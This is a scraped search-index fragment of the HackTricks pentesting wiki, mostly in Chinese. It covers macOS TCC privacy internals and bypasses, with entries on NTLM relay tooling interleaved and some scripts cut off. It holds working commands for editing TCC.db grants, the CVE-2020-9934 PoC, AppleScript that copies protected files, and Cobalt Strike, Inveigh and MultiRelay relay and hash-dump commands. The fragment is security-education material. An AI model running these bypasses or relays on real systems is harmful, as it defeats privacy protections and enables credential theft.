/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist (任何人可读)是需要 TCC 例外的应用程序的允许列表。 tip iOS 中的 TCC 数据库在 /private/var/mobile/Library/TCC/TCC.db 。 tip 通知中心 UI 可以对 系统 TCC 数据库 进行 更改 : codesign -dv --entitlements :- /System/Library/PrivateFrameworks/TCC.framework/> Support/tccd\\n[..]\\ncom.apple.private.tcc.manager\\ncom.apple.rootless.storage.TCC 但是,用户可以使用 tccutil 命令行工具 删除或查询规则 。 查询数据库 user DB\\nsystem DB bash sqlite3 ~/Library/Application\\\\ Support/com.apple.TCC/TCC.db\\nsqlite> .schema\\n# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id\\n# The table access contains the permissions per services\\nsqlite> select service, client, auth_value, auth_reason from access;\\nkTCCServiceLiverpool|com.apple.syncdefaultsd|2|4\\nkTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2\\nkTCCServiceMicrophone|us.zoom.xos|2|2\\n[...] # Check user approved permissions for telegram\\nsqlite> select * from access where client LIKE \\"%telegram%\\" and auth_value=2;\\n# Check user denied permissions for telegram\\nsqlite> select * from access where client LIKE \\"%telegram%\\" and auth_value=0; bash sqlite3 /Library/Application\\\\ Support/com.apple.TCC/TCC.db\\nsqlite> .schema\\n# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id\\n# The table access contains the permissions per services\\nsqlite> select service, client, auth_value, auth_reason from access;\\nkTCCServiceLiverpool|com.apple.syncdefaultsd|2|4\\nkTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2\\nkTCCServiceMicrophone|us.zoom.xos|2|2\\n[...] 
# Get all FDA\\nsqlite> select service, client, auth_value, auth_reason from access where service = \\"kTCCServiceSystemPolicyAllFiles\\" and auth_value=2; # Check user approved permissions for telegram\\nsqlite> select * from access where client LIKE \\"%telegram%\\" and auth_value=2;\\n# Check user denied permissions for telegram\\nsqlite> select * from access where client LIKE \\"%telegram%\\" and auth_value=0; tip 检查两个数据库,您可以查看应用程序允许、禁止或没有的权限(它会请求权限)。 service 是 TCC 权限 的字符串表示 client 是具有权限的 bundle ID 或 二进制路径 client_type 指示它是 Bundle Identifier(0) 还是绝对路径(1) 如果是绝对路径,如何执行 只需执行 launctl load you_bin.plist ,plist 如下: xml \\n\\n\\n\\n\\nLabel\\ncom.example.yourbinary \\nProgram\\n/path/to/binary \\nProgramArguments\\n\\narg1\\narg2\\n \\nRunAtLoad\\n \\nKeepAlive\\n \\nStandardOutPath\\n/tmp/YourBinary.stdout\\nStandardErrorPath\\n/tmp/YourBinary.stderr\\n\\n auth_value 可以有不同的值:denied(0)、unknown(1)、allowed(2) 或 limited(3)。 auth_reason 可以取以下值:Error(1)、User Consent(2)、User Set(3)、System Set(4)、Service Policy(5)、MDM Policy(6)、Override Policy(7)、Missing usage string(8)、Prompt Timeout(9)、Preflight Unknown(10)、Entitled(11)、App Type Policy(12) csreq 字段用于指示如何验证要执行的二进制文件并授予 TCC 权限: bash # Query to get cserq in printable hex\\nselect service, client, hex(csreq) from access where auth_value=2; # To decode it (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):\\nBLOB=\\"FADE0C000000003000000001000000060000000200000012636F6D2E6170706C652E5465726D696E616C000000000003\\"\\necho \\"$BLOB\\" | xxd -r -p > terminal-csreq.bin\\ncsreq -r- -t < terminal-csreq.bin # To create a new one (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):\\nREQ_STR=$(codesign -d -r- /Applications/Utilities/Terminal.app/ 2>&1 | awk -F \' => \' \'/designated/{print $2}\')\\necho \\"$REQ_STR\\" | csreq -r- -b /tmp/csreq.bin\\nREQ_HEX=$(xxd -p /tmp/csreq.bin | tr -d \'\\\\n\')\\necho \\"X\'$REQ_HEX\'\\" 有关表格中 其他字段 
的更多信息,请 查看这篇博客文章 。 您还可以在System Preferences --> Security & Privacy --> Privacy --> Files and Folders中检查 已授予的权限 。 tip 用户_可以_使用**tccutil** 删除或查询规则 。 重置 TCC 权限 bash # You can reset all the permissions given to an application with\\ntccutil reset All app.some.id # Reset the permissions granted to all apps\\ntccutil reset All","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » TCC 数据库","id":"2646","title":"TCC 数据库"},"2647":{"body":"TCC 数据库 存储应用程序的 Bundle ID ,但它还 存储 信息 关于 签名 以 确保 请求使用权限的应用是正确的。 bash # From sqlite\\nsqlite> select service, client, hex(csreq) from access where auth_value=2;\\n#Get csreq # From bash\\necho FADE0C00000000CC000000010000000600000007000000060000000F0000000E000000000000000A2A864886F763640601090000000000000000000600000006000000060000000F0000000E000000010000000A2A864886F763640602060000000000000000000E000000000000000A2A864886F7636406010D0000000000000000000B000000000000000A7375626A6563742E4F550000000000010000000A364E33385657533542580000000000020000001572752E6B656570636F6465722E54656C656772616D000000 | xxd -r -p - > /tmp/telegram_csreq.bin\\n## Get signature checks\\ncsreq -t -r /tmp/telegram_csreq.bin\\n(anchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = \\"6N38VWS5BX\\") and identifier \\"ru.keepcoder.Telegram\\" warning 因此,使用相同名称和包 ID 的其他应用程序将无法访问授予其他应用程序的权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » TCC 签名检查","id":"2647","title":"TCC 签名检查"},"2648":{"body":"应用程序 不仅需要 请求 并且已经 获得访问 某些资源的权限,它们还需要 拥有相关的权限 。 例如 Telegram 拥有权限 com.apple.security.device.camera 来请求 访问相机 。一个 没有 这个 权限的应用 将无法访问相机(用户甚至不会被询问权限)。 然而,对于应用程序 访问 某些用户文件夹,如 ~/Desktop、~/Downloads 和 ~/Documents,它们 不需要 任何特定的 权限 。系统将透明地处理访问并 根据需要提示用户 。 苹果的应用程序 不会生成提示 。它们在其 权限 列表中包含 
预先授予的权利 ,这意味着它们 永远不会生成弹出窗口 , 也 不会出现在任何 TCC 数据库 中。例如: bash codesign -dv --entitlements :- /System/Applications/Calendar.app\\n[...]\\ncom.apple.private.tcc.allow\\n\\nkTCCServiceReminders\\nkTCCServiceCalendar\\nkTCCServiceAddressBook\\n 这将避免日历请求用户访问提醒、日历和地址簿。 tip 除了一些关于权限的官方文档外,还可以找到关于权限的非官方 有趣信息 在 https://newosxbook.com/ent.jl 一些 TCC 权限包括:kTCCServiceAppleEvents, kTCCServiceCalendar, kTCCServicePhotos... 没有公开的列表定义所有权限,但您可以查看这个 已知权限列表 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 权限与 TCC 权限","id":"2648","title":"权限与 TCC 权限"},"2649":{"body":"$HOME(本身) $HOME/.ssh, $HOME/.aws, 等等 /tmp","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 敏感未保护位置","id":"2649","title":"敏感未保护位置"},"265":{"body":"Inveigh 是一个针对 Windows 系统的渗透测试人员和红队成员设计的工具。它提供类似于 Responder 的功能,执行欺骗和中间人攻击。该工具已从 PowerShell 脚本演变为 C# 二进制文件,主要版本为 Inveigh 和 InveighZero 。详细参数和说明可以在 wiki 中找到。 Inveigh 可以通过 PowerShell 操作: bash Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y 或作为 C# 二进制文件执行: bash Inveigh.exe","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » Inveigh","id":"265","title":"Inveigh"},"2650":{"body":"如前所述,可以通过将文件拖放到应用程序上来 授予应用程序对文件的访问权限 。此访问权限不会在任何 TCC 数据库中指定,而是作为文件的 扩展****属性 。此属性将 存储允许的应用程序的 UUID : bash xattr Desktop/private.txt\\ncom.apple.macl # Check extra access to the file\\n## Script from https://gist.githubusercontent.com/brunerd/8bbf9ba66b2a7787e1a6658816f3ad3b/raw/34cabe2751fb487dc7c3de544d1eb4be04701ac5/maclTrack.command\\nmacl_read Desktop/private.txt\\nFilename,Header,App UUID\\n\\"Desktop/private.txt\\",0300,769FD8F1-90E0-3206-808C-A8947BEBD6C3 # Get the UUID of the app\\notool -l /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal| grep uuid\\nuuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3 tip 有趣的是, com.apple.macl 属性是由 Sandbox 管理的,而不是 tccd。 还要注意,如果您将允许计算机上某个应用程序的 UUID 的文件移动到另一台计算机,由于同一应用程序将具有不同的 UID,它将无法授予该应用程序访问权限。 扩展属性 com.apple.macl 
无法像其他扩展属性那样被清除 ,因为它是 受 SIP 保护的 。然而,正如 在这篇文章中解释的 ,可以通过 压缩 文件、 删除 它和 解压缩 它来禁用它。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 用户意图 / com.apple.macl","id":"2650","title":"用户意图 / com.apple.macl"},"2651":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » TCC 权限提升与绕过","id":"2651","title":"TCC 权限提升与绕过"},"2652":{"body":"如果您在某个时刻成功获得 TCC 数据库的写入访问权限,可以使用以下内容添加条目(删除注释): 插入到 TCC 示例\\nsql INSERT INTO access (\\nservice,\\nclient,\\nclient_type,\\nauth_value,\\nauth_reason,\\nauth_version,\\ncsreq,\\npolicy_id,\\nindirect_object_identifier_type,\\nindirect_object_identifier,\\nindirect_object_code_identity,\\nflags,\\nlast_modified,\\npid,\\npid_version,\\nboot_uuid,\\nlast_reminded\\n) VALUES (\\n\'kTCCServiceSystemPolicyDesktopFolder\', -- service\\n\'com.googlecode.iterm2\', -- client\\n0, -- client_type (0 - bundle id)\\n2, -- auth_value (2 - allowed)\\n3, -- auth_reason (3 - \\"User Set\\")\\n1, -- auth_version (always 1)\\nX\'FADE0C00000000C40000000100000006000000060000000F0000000200000015636F6D2E676F6F676C65636F64652E697465726D32000000000000070000000E000000000000000A2A864886F7636406010900000000000000000006000000060000000E000000010000000A2A864886F763640602060000000000000000000E000000000000000A2A864886F7636406010D0000000000000000000B000000000000000A7375626A6563742E4F550000000000010000000A483756375859565137440000\', -- csreq is a BLOB, set to NULL for now\\nNULL, -- policy_id\\nNULL, -- indirect_object_identifier_type\\n\'UNUSED\', -- indirect_object_identifier - default value\\nNULL, -- indirect_object_code_identity\\n0, -- flags\\nstrftime(\'%s\', \'now\'), -- last_modified with default current timestamp\\nNULL, -- assuming pid is an integer and optional\\nNULL, -- assuming pid_version is an integer and optional\\n\'UNUSED\', -- default value for boot_uuid\\nstrftime(\'%s\', \'now\') -- last_reminded with default current timestamp\\n);","breadcrumbs":"macOS Security & 
Privilege Escalation » macOS Security Protections » macOS TCC » 插入到 TCC","id":"2652","title":"插入到 TCC"},"2653":{"body":"如果你成功进入了一个具有某些 TCC 权限的应用程序,请查看以下页面以获取 TCC 负载以进行滥用: macOS TCC Payloads","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » TCC Payloads","id":"2653","title":"TCC Payloads"},"2654":{"body":"了解 Apple Events 的内容: macOS Apple Events","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » Apple Events","id":"2654","title":"Apple Events"},"2655":{"body":"TCC 权限的 Automation 名称是: kTCCServiceAppleEvents 这个特定的 TCC 权限还指示了 可以在 TCC 数据库中管理的应用程序 (因此权限并不允许管理所有内容)。 Finder 是一个 始终具有 FDA 的应用程序(即使它在 UI 中不显示),因此如果你对它拥有 Automation 权限,你可以滥用其权限以 执行某些操作 。 在这种情况下,你的应用程序需要对 com.apple.Finder 拥有权限 kTCCServiceAppleEvents 。 Steal users TCC.db\\nSteal systems TCC.db applescript # This AppleScript will copy the system TCC database into /tmp\\nosascript< \\"/tmp/script.js\\" < Script Manager -> Load (Select PortBender.cna) beacon> cd C:\\\\Windows\\\\system32\\\\drivers # Navigate to drivers directory\\nbeacon> upload C:\\\\PortBender\\\\WinDivert64.sys # Upload driver\\nbeacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445\\nbeacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server\\nbeacon> socks 1080 # Establish a SOCKS proxy on port 1080 # Termination commands\\nbeacon> jobs\\nbeacon> jobkill 0\\nbeacon> rportfwd stop 8445\\nbeacon> socks stop","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » NTLM Relay Attack","id":"266","title":"NTLM Relay Attack"},"2660":{"body":"kTCCServiceSystemPolicySysAdminFiles 允许 更改 用户的 NFSHomeDirectory 属性,这会更改他的主文件夹,从而允许 绕过 TCC 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 系统策略 SysAdmin 文件到 FDA","id":"2660","title":"系统策略 SysAdmin 文件到 FDA"},"2661":{"body":"获得 用户 TCC 数据库的 写权限 你 不能 授予自己 FDA 权限,只有系统数据库中的用户可以授予该权限。 但你可以 授予 自己 
Finder 的自动化权限 ,并滥用之前的技术提升到 FDA*。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 用户 TCC 数据库到 FDA","id":"2661","title":"用户 TCC 数据库到 FDA"},"2662":{"body":"完全磁盘访问 在 TCC 中的名称是 kTCCServiceSystemPolicyAllFiles 我认为这不是真正的权限提升,但以防你觉得有用:如果你控制一个具有 FDA 的程序,你可以 修改用户的 TCC 数据库并授予自己任何访问权限 。这可以作为一种持久性技术,以防你可能失去 FDA 权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » FDA 到 TCC 权限","id":"2662","title":"FDA 到 TCC 权限"},"2663":{"body":"系统 TCC 数据库 受到 SIP 保护,这就是为什么只有具有 指示的权限 的进程才能修改它。因此,如果攻击者找到一个 SIP 绕过 通过一个 文件 (能够修改受 SIP 限制的文件),他将能够: 移除 TCC 数据库的保护,并授予自己所有 TCC 权限。他可以滥用这些文件中的任何一个,例如: TCC 系统数据库 REG.db MDMOverrides.plist 然而,还有另一种选择可以滥用这个 SIP 绕过以绕过 TCC ,文件 /Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist 是一个需要 TCC 例外的应用程序的允许列表。因此,如果攻击者能够 移除此文件的 SIP 保护 并添加自己的 应用程序 ,该应用程序将能够绕过 TCC。 例如添加终端: bash # Get needed info\\ncodesign -d -r- /System/Applications/Utilities/Terminal.app AllowApplicationsList.plist: xml \\n\\n\\n\\nServices\\n\\nSystemPolicyAllFiles\\n\\n\\nCodeRequirement\\nidentifier "com.apple.Terminal" and anchor apple\\nIdentifierType\\nbundleID\\nIdentifier\\ncom.apple.Terminal\\n\\n\\n\\n\\n","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » SIP 绕过到 TCC 绕过","id":"2663","title":"SIP 绕过到 TCC 绕过"},"2664":{"body":"macOS TCC Bypasses","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » TCC 绕过","id":"2664","title":"TCC 绕过"},"2665":{"body":"https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive https://gist.githubusercontent.com/brunerd/8bbf9ba66b2a7787e1a6658816f3ad3b/raw/34cabe2751fb487dc7c3de544d1eb4be04701ac5/maclTrack.command https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/ https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red 
Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 参考文献","id":"2665","title":"参考文献"},"2666":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS Apple Events » macOS Apple Events","id":"2666","title":"macOS Apple Events"},"2667":{"body":"Apple Events 是苹果 macOS 中的一个功能,允许应用程序相互通信。它们是 Apple Event Manager 的一部分,该组件负责处理进程间通信。该系统使一个应用程序能够向另一个应用程序发送消息,请求其执行特定操作,例如打开文件、检索数据或执行命令。 mina 守护进程是 /System/Library/CoreServices/appleeventsd,它注册了服务 com.apple.coreservices.appleevents。 每个可以接收事件的应用程序都会与此守护进程检查,提供其 Apple Event Mach Port。当一个应用程序想要向其发送事件时,该应用程序将从守护进程请求此端口。 沙盒应用程序需要特权,如 allow appleevent-send 和 (allow mach-lookup (global-name \\"com.apple.coreservices.appleevents)),才能发送事件。注意,像 com.apple.security.temporary-exception.apple-events 的权限可能会限制谁可以发送事件,这将需要像 com.apple.private.appleevents 的权限。 tip 可以使用环境变量 AEDebugSends 来记录发送的消息的信息: AEDebugSends=1 osascript -e \'tell application \\"iTerm\\" to activate\' tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS Apple Events » 基本信息","id":"2667","title":"基本信息"},"2668":{"body":"Reading time: 26 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » macOS TCC Bypasses","id":"2668","title":"macOS TCC Bypasses"},"2669":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 按功能","id":"2669","title":"按功能"},"267":{"body":"Metasploit : 配置代理、本地和远程主机详细信息。 smbrelayx : 用于中继 SMB 会话并执行命令或部署后门的 Python 脚本。 MultiRelay : Responder 套件中的一个工具,用于中继特定用户或所有用户,执行命令或转储哈希。 每个工具都可以配置为通过 SOCKS 代理操作,如果需要,即使在间接网络访问的情况下也能进行攻击。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 其他 NTLM 中继攻击工具","id":"267","title":"其他 NTLM 中继攻击工具"},"2670":{"body":"这不是一个绕过,这只是 TCC 的工作方式: 它不防止写入 。如果终端 没有权限读取用户的桌面,它仍然可以写入 : shell-session username@hostname ~ % ls Desktop\\nls: Desktop: Operation not permitted\\nusername@hostname ~ % echo asd > Desktop/lalala\\nusername@hostname ~ % ls Desktop\\nls: Desktop: Operation not permitted\\nusername@hostname ~ % cat Desktop/lalala\\nasd 扩展属性 com.apple.macl 被添加到新 文件 以便给 创建者应用 访问读取它的权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 写入绕过","id":"2670","title":"写入绕过"},"2671":{"body":"可以 在 TCC 提示上放置一个窗口 ,使用户 接受 而不注意。你可以在 TCC-ClickJacking ** 中找到一个 PoC。** 
https://github.com/breakpointHQ/TCC-ClickJacking/raw/main/resources/clickjacking.jpg","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » TCC ClickJacking","id":"2671","title":"TCC ClickJacking"},"2672":{"body":"攻击者可以 创建任何名称的应用 (例如 Finder、Google Chrome...)在 Info.plist 中,并使其请求访问某些 TCC 保护的位置。用户会认为是合法应用在请求此访问。 此外,可以 从 Dock 中移除合法应用并将假应用放上去 ,因此当用户点击假应用(可以使用相同的图标)时,它可以调用合法应用,请求 TCC 权限并执行恶意软件,使用户相信是合法应用请求了访问。 更多信息和 PoC 在: macOS Privilege Escalation","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » TCC 请求任意名称","id":"2672","title":"TCC 请求任意名称"},"2673":{"body":"默认情况下,通过 SSH 的访问曾经具有 \\"完全磁盘访问\\" 。为了禁用此功能,你需要将其列出但禁用(从列表中移除不会删除这些权限): 在这里你可以找到一些 恶意软件如何能够绕过此保护 的示例: https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/ caution 请注意,现在要启用 SSH,你需要 完全磁盘访问","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » SSH 绕过","id":"2673","title":"SSH 绕过"},"2674":{"body":"属性 com.apple.macl 被赋予文件,以便给 某个应用程序读取它的权限。 当 拖放 文件到应用上,或当用户 双击 文件以使用 默认应用 打开时,会设置此属性。 因此,用户可以 注册一个恶意应用 来处理所有扩展,并调用 Launch Services 来 打开 任何文件(这样恶意文件将被授予读取权限)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 处理扩展 - CVE-2022-26767","id":"2674","title":"处理扩展 - CVE-2022-26767"},"2675":{"body":"权限 com.apple.private.icloud-account-access 使得与 com.apple.iCloudHelper XPC 服务进行通信成为可能,该服务将 提供 iCloud 令牌 。 iMovie 和 Garageband 拥有此权限以及其他允许的权限。 有关利用该权限 获取 iCloud 令牌 的更多 信息 ,请查看演讲: #OBTS v5.0: \\"What Happens on your Mac, Stays on Apple\'s iCloud?!\\" - Wojciech Regula","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » iCloud","id":"2675","title":"iCloud"},"2676":{"body":"具有 kTCCServiceAppleEvents 权限的应用将能够 控制其他应用 。这意味着它可能会 滥用授予其他应用的权限 。 有关 Apple 脚本的更多信息,请查看: macOS Apple Scripts 例如,如果一个应用对 iTerm 具有 
自动化权限 ,例如在这个例子中 Terminal 对 iTerm 具有访问权限: 在 iTerm 上 没有 FDA 的 Terminal 可以调用具有 FDA 的 iTerm,并利用它执行操作: iterm.script tell application \\"iTerm\\"\\nactivate\\ntell current window\\ncreate tab with default profile\\nend tell\\ntell current session of current window\\nwrite text \\"cp ~/Desktop/private.txt /tmp\\"\\nend tell\\nend tell bash osascript iterm.script 通过 Finder 或者如果一个应用程序可以访问 Finder,它可以使用这样的脚本: applescript set a_user to do shell script \\"logname\\"\\ntell application \\"Finder\\"\\nset desc to path to home folder\\nset copyFile to duplicate (item \\"private.txt\\" of folder \\"Desktop\\" of folder a_user of item \\"Users\\" of disk of home) to folder desc with replacing\\nset t to paragraphs of (do shell script \\"cat \\" & POSIX path of (copyFile as alias)) as text\\nend tell\\ndo shell script \\"rm \\" & POSIX path of (copyFile as alias)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » kTCCServiceAppleEvents / 自动化","id":"2676","title":"kTCCServiceAppleEvents / 自动化"},"2677":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » By App behaviour","id":"2677","title":"By App behaviour"},"2678":{"body":"用户空间的 tccd daemon 使用 HOME env 变量从以下位置访问 TCC 用户数据库: $HOME/Library/Application Support/com.apple.TCC/TCC.db 根据 this Stack Exchange post 并且因为 TCC daemon 是通过 launchd 在当前用户的域中运行的,所以可以 控制所有传递给它的环境变量 。 因此, 攻击者可以在 launchctl 中设置 $HOME 环境 变量指向一个 受控 目录 , 重启 TCC daemon,然后 直接修改 TCC 数据库 以赋予自己 所有可用的 TCC 权限 ,而无需提示最终用户。 PoC: bash # reset database just in case (no cheating!)\\n$> tccutil reset All\\n# mimic TCC\'s directory structure from ~/Library\\n$> mkdir -p \\"/tmp/tccbypass/Library/Application Support/com.apple.TCC\\"\\n# cd into the new directory\\n$> cd \\"/tmp/tccbypass/Library/Application Support/com.apple.TCC/\\"\\n# set launchd $HOME to this temporary directory\\n$> launchctl setenv HOME /tmp/tccbypass\\n# restart the TCC 
daemon\\n$> launchctl stop com.apple.tccd && launchctl start com.apple.tccd\\n# print out contents of TCC database and then give Terminal access to Documents\\n$> sqlite3 TCC.db .dump\\n$> sqlite3 TCC.db \\"INSERT INTO access\\nVALUES(\'kTCCServiceSystemPolicyDocumentsFolder\',\\n\'com.apple.Terminal\', 0, 1, 1,\\nX\'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003\',\\nNULL,\\nNULL,\\n\'UNUSED\',\\nNULL,\\nNULL,\\n1333333333333337);\\"\\n# list Documents directory without prompting the end user\\n$> ls ~/Documents","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020–9934 - TCC","id":"2678","title":"CVE-2020–9934 - TCC"},"2679":{"body":"Notes 可以访问 TCC 保护的位置,但当创建一个笔记时,它是 在一个非保护的位置创建的 。因此,您可以要求 Notes 将一个受保护的文件复制到一个笔记中(即在一个非保护的位置),然后访问该文件:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2021-30761 - 备注","id":"2679","title":"CVE-2021-30761 - 备注"},"268":{"body":"MultiRelay 从 /usr/share/responder/tools 目录执行,针对特定 IP 或用户。 bash python MultiRelay.py -t -u ALL # Relay all users\\npython MultiRelay.py -t -u ALL -c whoami # Execute command\\npython MultiRelay.py -t -u ALL -d # Dump hashes # Proxychains for routing traffic 这些工具和技术形成了一套全面的工具,用于在各种网络环境中进行 NTLM 中继攻击。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » MultiRelay 操作","id":"268","title":"MultiRelay 操作"},"2680":{"body":"二进制文件 /usr/libexec/lsd 与库 libsecurity_translocate 具有特权 com.apple.private.nullfs_allow,这允许它创建 nullfs 挂载,并且具有特权 com.apple.private.tcc.allow,以 kTCCServiceSystemPolicyAllFiles 访问每个文件。 可以将隔离属性添加到 \\"Library\\",调用 com.apple.security.translocation XPC 服务,然后它会将 Library 映射到 $TMPDIR/AppTranslocation/d/d/Library ,其中 Library 内的所有文档都可以 访问 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2021-30782 - 
迁移","id":"2680","title":"CVE-2021-30782 - 迁移"},"2681":{"body":"Music 有一个有趣的功能:当它运行时,它会 导入 被拖放到 ~/Music/Music/Media.localized/Automatically Add to Music.localized 的文件到用户的 \\"媒体库\\"。此外,它调用类似于: rename(a, b); 的内容,其中 a 和 b 是: a = \\"~/Music/Music/Media.localized/Automatically Add to Music.localized/myfile.mp3\\" b = \\"~/Music/Music/Media.localized/Automatically Add to Music.localized/Not Added.localized/2023-09-25 11.06.28/myfile.mp3 这个 rename(a, b); 行为容易受到 竞争条件 的影响,因为可以在 Automatically Add to Music.localized 文件夹中放置一个假的 TCC.db 文件,然后在创建新文件夹(b)以复制文件时,删除它,并指向 ~/Library/Application Support/com.apple.TCC 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2023-38571 - 音乐与电视","id":"2681","title":"CVE-2023-38571 - 音乐与电视"},"2682":{"body":"如果 SQLITE_SQLLOG_DIR=\\"path/folder\\" ,基本上意味着 任何打开的数据库都会被复制到该路径 。在这个 CVE 中,这个控制被滥用以 写入 一个 SQLite 数据库 ,该数据库将被 一个具有 FDA 的进程打开 TCC 数据库 ,然后滥用 SQLITE_SQLLOG_DIR ,在文件名中使用 符号链接 ,因此当该数据库被 打开 时,用户的 TCC.db 被打开的数据库覆盖 。 更多信息 在写作中 和 在演讲中 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » SQLITE_SQLLOG_DIR - CVE-2023-32422","id":"2682","title":"SQLITE_SQLLOG_DIR - CVE-2023-32422"},"2683":{"body":"如果环境变量 SQLITE_AUTO_TRACE 被设置,库 libsqlite3.dylib 将开始 记录 所有 SQL 查询。许多应用程序使用这个库,因此可以记录它们所有的 SQLite 查询。 多个 Apple 应用程序使用这个库来访问 TCC 保护的信息。 bash # Set this env variable everywhere\\nlaunchctl setenv SQLITE_AUTO_TRACE 1","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » 